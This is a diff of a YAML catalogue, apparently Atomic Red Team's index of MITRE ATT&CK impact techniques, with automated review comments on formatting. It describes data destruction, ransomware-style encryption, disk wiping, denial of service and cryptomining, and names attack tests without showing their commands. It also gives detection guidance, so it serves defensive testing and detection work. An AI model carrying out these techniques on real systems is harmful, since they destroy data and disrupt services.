x_mitre_permissions_required: + - User + - Administrator + - root + - SYSTEM + x_mitre_impact_type: + - Availability + x_mitre_version: '1.0' x_mitre_detection: |- Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account: 
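Review bot: the only substantive change in this T1531 hunk is the data-source rename (Windows event logs / Process command-line parameters / Process monitoring become 'User Account: User Account Deletion', 'User Account: User Account Modification' and 'Active Directory: Active Directory Object Modification'), yet the hunk also deletes object_marking_refs, created_by_ref, name, description, id, type, kill_chain_phases, modified, created and x_mitre_is_subtechnique and re-adds them unchanged further up the mapping. Emitting technique keys in a fixed order in the generator (sorted, or the ATT&CK field order) would keep a regenerate-and-commit diff limited to the fields that actually changed, which is what a reviewer of detection guidance needs to see.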
@@ -43297,22 +45885,7 @@ impact: * Event ID 4740 - A user account was locked out Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. - x_mitre_version: '1.0' - x_mitre_impact_type: - - Availability - x_mitre_permissions_required: - - User - - Administrator - - root - - SYSTEM - x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: false identifier: T1531 atomic_tests: - name: Change User Password - Windows @@ -43440,9 +46013,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T02:01:10.832Z' + modified: '2021-03-29T16:08:52.118Z' created: '2020-02-20T15:35:00.025Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability 
@@ -43451,22 +46024,19 @@ impact: In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. x_mitre_data_sources: - - Network device logs - - Network device logs - - Network intrusion detection system - - Web application firewall logs - - Web logs - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace atomic_tests: [] T1499.004: technique: @@ -43492,9 +46062,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T02:07:27.508Z' + modified: '2021-03-29T16:09:41.559Z' created: '2020-02-20T15:37:27.052Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability 
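Review bot: the platform lists written in these T1499.003 and T1499.004 hunks come out as Windows, Azure AD, Office 365, SaaS, IaaS, Linux, macOS, Google Workspace, while the T1486 hunk below writes Linux, macOS, Windows, IaaS and the T1485 hunk writes Windows, IaaS, Linux, macOS; since x_mitre_platforms is a set, have the generator sort it so the diff shows the real change (AWS, GCP and Azure collapsed into IaaS, Google Workspace added) rather than a reshuffle of unchanged entries.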
@@ -43503,43 +46073,36 @@ impact: identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS. x_mitre_data_sources: - - Network device logs - - Network intrusion detection system - - Web application firewall logs - - Web logs - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace atomic_tests: [] T1485: technique: - id: attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c - description: |- - Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. 
- - Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) - - To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018) - name: Data Destruction - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2019-03-14T18:47:17.701Z' + modified: '2021-03-25T14:47:48.728Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: impact + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1485 url: https://attack.mitre.org/techniques/T1485 - - source_name: Symantec Shamoon 2012 - url: https://www.symantec.com/connect/blogs/shamoon-attacks - description: Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March + - description: Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019. + url: https://www.symantec.com/connect/blogs/shamoon-attacks + source_name: Symantec Shamoon 2012 - url: https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html description: FireEye. (2016, November 30). 
FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. 
@@ -43552,43 +46115,70 @@ impact: url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf description: 'Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.' - - source_name: Unit 42 Shamoon3 2018 - url: https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/ - description: Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas + - description: Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019. + url: https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/ + source_name: Unit 42 Shamoon3 2018 - source_name: Talos Olympic Destroyer 2018 url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: impact - modified: '2020-03-27T21:08:19.783Z' - created: '2019-03-14T18:47:17.701Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows + - source_name: Data Destruction - Threat Post + url: https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/ + description: Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code + Spaces Out of Business. Retrieved December 15, 2020. + - source_name: DOJ - Cisco Insider + url: https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network + description: DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging + Cisco’s Network. Retrieved December 15, 2020. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data Destruction + description: |- + Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. 
+ + Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) + + To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018). + + In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) + id: attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c + x_mitre_impact_type: + - Availability + x_mitre_detection: |- + Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\Windows\System32\. 
+ + In cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Deletion' + - 'Image: Image Deletion' + - 'Instance: Instance Deletion' + - 'Snapshot: Snapshot Deletion' + - 'Cloud Storage: Cloud Storage Deletion' + - 'Volume: Volume Deletion' + x_mitre_version: '1.1' x_mitre_permissions_required: - User - Administrator - root - SYSTEM - x_mitre_version: '1.0' - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_detection: Use process monitoring to monitor the execution and command-line - parameters of binaries that could be involved in data destruction activity, - such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the - creation of suspicious files as well as high unusual file modification activity. - In particular, look for large quantities of file modifications in user directories - and under C:\Windows\System32\. - x_mitre_impact_type: - - Availability + x_mitre_platforms: + - Windows + - IaaS + - Linux + - macOS + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + - Syed Ummar Farooqh, McAfee + - Prasad Somasamudram, McAfee + - 'Sekhar Sarukkai, McAfee ' + - Varonis Threat Labs identifier: T1485 atomic_tests: - name: Windows - Overwrite file with Sysinternals SDelete 
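Review bot: the contributor entry `'Sekhar Sarukkai, McAfee '` in this T1485 hunk carries a trailing space inside the quotes, which is why it is the only quoted item in the list; trim it (upstream or in the generator) so the name dedups and renders like the others. Two wording issues in the re-added text: the third description paragraph now ends `(Citation: Talos Olympic Destroyer 2018).` with a period that the removed version did not have and that no other paragraph places after a citation, and the detection text's 'high unusual file modification activity' should read 'highly unusual' or 'high volumes of unusual'.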
@@ -43654,6 +46244,8 @@ impact: Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) + + In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) name: Data Encrypted for Impact created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: 
@@ -43678,12 +46270,18 @@ impact: url: https://www.us-cert.gov/ncas/alerts/AA18-337A description: 'US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.' + - source_name: Rhino S3 Ransomware Part 1 + url: https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ + description: 'Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved + April 14, 2021.' type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-10-14T14:52:11.708Z' + modified: '2021-04-20T16:39:06.594Z' created: '2019-03-15T13:59:30.390Z' + x_mitre_contributors: + - Oleg Kolesnikov, Securonix x_mitre_is_subtechnique: false x_mitre_impact_type: - Availability @@ -43691,21 +46289,26 @@ impact: Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories. In some cases, monitoring for unusual kernel driver installation activity can aid in detection. + + In cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies. x_mitre_data_sources: - - Kernel drivers - - File monitoring - - Process command-line parameters - - Process monitoring + - 'Cloud Storage: Cloud Storage Metadata' + - 'Cloud Storage: Cloud Storage Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' x_mitre_platforms: - Linux - macOS - Windows + - IaaS x_mitre_permissions_required: - User - Administrator - root - SYSTEM - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1486 atomic_tests: - name: Encrypt files using gpg (Linux) 
@@ -43903,7 +46506,7 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-28T23:16:20.202Z' + modified: '2021-04-24T14:04:16.371Z' created: '2020-03-02T14:19:22.609Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -43919,10 +46522,13 @@ impact: involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. x_mitre_data_sources: - - Packet capture - - Network protocol analysis - - File monitoring - - Application logs + - 'File: File Metadata' + - 'Process: OS API Execution' + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Modification' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -43949,17 +46555,15 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-04-22T15:19:31.682Z' + modified: '2021-03-08T10:33:01.150Z' created: '2019-04-08T17:51:41.390Z' x_mitre_is_subtechnique: false - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure x_mitre_impact_type: - Integrity x_mitre_detection: "Monitor internal and external websites for unplanned content @@ -43968,10 +46572,10 @@ impact: artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n" x_mitre_data_sources: - - Packet capture - - Web application firewall logs - - Web logs - - Packet capture + - 'File: File Modification' + - 'File: File Creation' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1498.001: technique: 
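Review bot: in the T1491 hunk the x_mitre_detection scalar ends with `exploitation.\n\n"`, two embedded trailing newlines that survive into the rendered technique docs as blank lines; strip trailing whitespace from description and detection strings in the generator rather than carrying it through every regeneration.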
@@ -44006,14 +46610,11 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:57:12.410Z' + modified: '2021-03-29T16:11:56.727Z' created: '2020-03-02T20:07:18.651Z' x_mitre_data_sources: - - Sensor health and status - - Network protocol analysis - - Netflow/Enclave netflow - - Network intrusion detection system - - Network device logs + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring @@ -44026,20 +46627,19 @@ impact: time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure AD - - SaaS - - Azure - - Office 365 + - Google Workspace atomic_tests: [] T1561.001: technique: @@ -44086,9 +46686,11 @@ impact: - macOS - Windows x_mitre_data_sources: - - Kernel drivers - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Driver: Driver Load' + - 'Drive: Drive Access' + - 'Drive: Drive Modification' x_mitre_detection: 'Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: 
@@ -44180,9 +46782,11 @@ impact: read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.' x_mitre_data_sources: - - Kernel drivers - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Driver: Driver Load' + - 'Drive: Drive Access' + - 'Drive: Drive Modification' x_mitre_platforms: - Linux - macOS @@ -44232,9 +46836,11 @@ impact: using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.' x_mitre_data_sources: - - Kernel drivers - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Driver: Driver Load' + - 'Drive: Drive Access' + - 'Drive: Drive Modification' x_mitre_platforms: - Linux - macOS @@ -44307,8 +46913,14 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:56:03.459Z' + modified: '2021-04-14T12:05:31.985Z' created: '2019-04-18T11:00:55.862Z' + x_mitre_contributors: + - Alfredo Oliveira, Trend Micro + - David Fiser, @anu4is, Trend Micro + - Magno Logan, @magnologan, Trend Micro + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team x_mitre_is_subtechnique: false x_mitre_detection: |- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts. 
@@ -44317,26 +46929,23 @@ impact: Externally monitor the availability of services that may be targeted by an Endpoint DoS. x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_impact_type: - Availability - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_data_sources: - - SSL/TLS inspection - - Web logs - - Web application firewall logs - - Network intrusion detection system - - Network protocol analysis - - Network device logs - - Netflow/Enclave netflow + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' atomic_tests: [] T1491.002: technique: @@ -44381,9 +46990,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-04-22T15:19:31.380Z' + modified: '2021-03-08T10:33:01.745Z' created: '2020-02-20T14:34:08.496Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Integrity @@ -44393,16 +47002,15 @@ impact: of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation. x_mitre_data_sources: - - Web logs - - Web application firewall logs - - Packet capture + - 'File: File Modification' + - 'File: File Creation' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure atomic_tests: [] T1495: technique: @@ -44450,8 +47058,7 @@ impact: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.' x_mitre_data_sources: - - BIOS - - Component firmware + - 'Firmware: Firmware Modification' atomic_tests: [] T1490: technique: 
@@ -44499,11 +47106,11 @@ impact: - User x_mitre_version: '1.0' x_mitre_data_sources: - - Windows Registry - - Services - - Windows event logs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Deletion' x_mitre_detection: |- Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. @@ -44675,9 +47282,10 @@ impact: of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation. x_mitre_data_sources: - - Web logs - - Web application firewall logs - - Packet capture + - 'File: File Modification' + - 'File: File Creation' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -44774,8 +47382,11 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:58:18.788Z' + modified: '2021-04-12T18:34:06.995Z' created: '2019-04-17T20:23:15.105Z' + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee x_mitre_is_subtechnique: false x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the 
@@ -44790,24 +47401,21 @@ impact: service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' x_mitre_data_sources: - - Sensor health and status - - Network protocol analysis - - Netflow/Enclave netflow - - Network intrusion detection system - - Network device logs - x_mitre_version: '1.0' + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Flow' + x_mitre_version: '1.1' x_mitre_impact_type: - Availability x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure AD - - SaaS - - Azure - - Office 365 + - Google Workspace + - Containers atomic_tests: [] T1499.001: technique: @@ -44869,10 +47477,9 @@ impact: study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.' x_mitre_data_sources: - - Network device logs - - Netflow/Enclave netflow - - Network intrusion detection system - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -44926,14 +47533,11 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:58:18.490Z' + modified: '2021-03-29T16:13:53.747Z' created: '2020-03-02T20:08:03.691Z' x_mitre_data_sources: - - Sensor health and status - - Network protocol analysis - - Netflow/Enclave netflow - - Network intrusion detection system - - Network device logs + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive 
@@ -44946,20 +47550,19 @@ impact: the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability x_mitre_platforms: - - macOS - Windows - - Linux - - AWS - - Office 365 - Azure AD - - GCP - - Azure + - Office 365 - SaaS + - IaaS + - Linux + - macOS + - Google Workspace atomic_tests: [] T1496: technique: @@ -44973,15 +47576,21 @@ impact: Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised - and used for Resource Hijacking and cryptocurrency mining." + and used for Resource Hijacking and cryptocurrency mining. Containerized environments + may also be targeted due to the ease of deployment via exposed APIs and the + potential for scaling mining activities by deploying or compromising multiple + containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: + Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining + malware kills off processes for competing malware to ensure it’s not competing + for resources.(Citation: Trend Micro War of Crypto Miners)" name: Resource Hijacking created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - - url: https://attack.mitre.org/techniques/T1496 - source_name: mitre-attack + - source_name: mitre-attack external_id: T1496 + url: https://attack.mitre.org/techniques/T1496 - description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019. url: https://securelist.com/lazarus-under-the-hood/77908/ 
@@ -44990,34 +47599,51 @@ impact: Retrieved October 8, 2019. url: https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc source_name: CloudSploit - Unused AWS Regions + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. Retrieved April 5, 2021.' + - source_name: Trend Micro Exposed Docker APIs + url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html + description: Oliveira, A. (2019, May 30). Infected Containers Target Docker + via Exposed APIs. Retrieved April 6, 2021. + - source_name: Trend Micro War of Crypto Miners + url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html + description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency + Miners: A Battle for Resources. Retrieved April 6, 2021.' 
type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-07-14T19:29:17.574Z' + modified: '2021-04-14T12:06:32.187Z' created: '2019-04-17T14:50:05.682Z' + x_mitre_contributors: + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Jay Chen, Palo Alto Networks + - Magno Logan, @magnologan, Trend Micro + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team x_mitre_is_subtechnique: false x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure + - Containers x_mitre_permissions_required: - User - Administrator x_mitre_impact_type: - Availability - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs - - Process use of network - - Process monitoring - - Network protocol analysis - - Network device logs + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Sensor Health: Host Status' x_mitre_detection: Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use @@ -45073,8 +47699,11 @@ impact: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Modification' + - 'File: File Metadata' x_mitre_detection: Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values. x_mitre_impact_type: 
@@ -45135,9 +47764,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:56:03.131Z' + modified: '2021-03-29T16:11:12.815Z' created: '2020-02-20T15:31:43.613Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability 
